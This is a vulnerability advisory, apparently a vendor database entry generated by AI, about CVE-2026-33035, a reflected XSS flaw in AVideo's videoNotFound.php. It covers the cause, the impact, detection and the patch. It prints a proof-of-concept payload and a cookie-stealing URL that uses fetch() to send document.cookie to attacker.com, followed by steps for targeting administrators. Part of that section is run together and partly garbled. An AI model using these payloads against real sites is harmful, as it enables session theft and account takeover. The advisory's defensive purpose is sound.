
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33035 is a reflected cross-site scripting (XSS) vulnerability in WWBN AVideo, an open source video platform, that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser. It affects AVideo versions 25.0 and below (all versions prior to 26.0). The vulnerability was published on March 16, 2026, and patched in version 26.0. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.3 (Medium) (Github Advisory, AVideo Security Advisory).
The vulnerability (CWE-79) is caused by two issues working in tandem. First, in view/videoNotFound.php (line 49), user input from the 404ErrorMsg URL parameter is passed through PHP's json_encode() with default flags, which escapes quotes and backslashes but does not escape HTML special characters (<, >, /), allowing raw HTML tags to flow into JavaScript. Second, in view/js/script.js, the avideoAlertHTMLText() function (and three other alert functions) assigns this value to span.innerHTML, which causes the browser to parse and execute embedded HTML/JavaScript. The full data flow is: ?404ErrorMsg=PAYLOAD → $_REQUEST['404ErrorMsg'] → json_encode() → avideoAlertInfo() → avideoAlert() → avideoAlertHTMLText() → span.innerHTML = msg. The innerHTML sink exists in four separate functions, meaning any future code passing user input to these alert helpers would also be vulnerable (Github Advisory, AVideo Security Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of any user who clicks a crafted link. Because the PHPSESSID cookie lacks the HttpOnly flag by default, attackers can steal session cookies and perform full account takeover, including administrator accounts. Additional escalation paths include injecting phishing login forms within the SweetAlert modal, spreading self-propagating payloads via comments or messages, and gaining complete administrative control over the AVideo platform (Github Advisory, AVideo Security Advisory).
A concrete proof-of-concept (PoC) payload is publicly documented in the GitHub Security Advisory: https://[target]/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=alert(document.domain)>. No authentication or special privileges are required — only user interaction (a victim clicking the crafted URL). The EPSS score is approximately 0.041% (13th percentile), and there is no evidence of active in-the-wild exploitation or CISA KEV catalog listing as of the time of publication (AVideo Security Advisory, Github Advisory).
404ErrorMsg parameter, e.g.:https://[target]/view/videoNotFound.php?404ErrorMsg=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>avideoAlertInfo("<img src=x onerror=...>"); into the page. The avideoAlertHTMLText() function assigns this to span.innerHTML, causing the browser to instantiate the <img> element and fire the onerror handler.PHPSESSID cookie (accessible due to missing HttpOnly flag) to the attacker's server, enabling account takeover. For admin targeting, deliver the link specifically to an administrator to gain full platform control (AVideo Security Advisory, Github Advisory)./view/videoNotFound.php with URL-encoded HTML tags or JavaScript event handlers (e.g., onerror, onload, <img, <script) in the 404ErrorMsg parameter; multiple requests from different IPs with identical crafted payloads (indicating a phishing campaign).The primary remediation is to upgrade WWBN AVideo to version 26.0 or later, which includes the fix in commit cca6196 (AVideo Patch Commit). The patch applies two fixes: (1) using json_encode() with JSON_HEX_TAG | JSON_HEX_AMP flags in videoNotFound.php to escape < and > as Unicode escapes, and (2) replacing span.innerHTML = msg with span.textContent = msg in alert functions (introducing a new avideoCreateAlertContent() helper). As additional hardening measures, set the HttpOnly flag on the PHPSESSID cookie to prevent JavaScript access, and deploy a Content-Security-Policy header (default-src 'self'; script-src 'self') to restrict script execution (Github Advisory, AVideo Security Advisory).
The vulnerability was published by DanielnetoDotCom to the WWBN/AVideo repository on March 16, 2026, and reviewed by the GitHub Advisory Database on March 17, 2026. A Bluesky post referencing the CVE was observed shortly after NVD publication, indicating some community awareness. No significant vendor statements beyond the advisory or notable independent researcher commentary have been identified (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."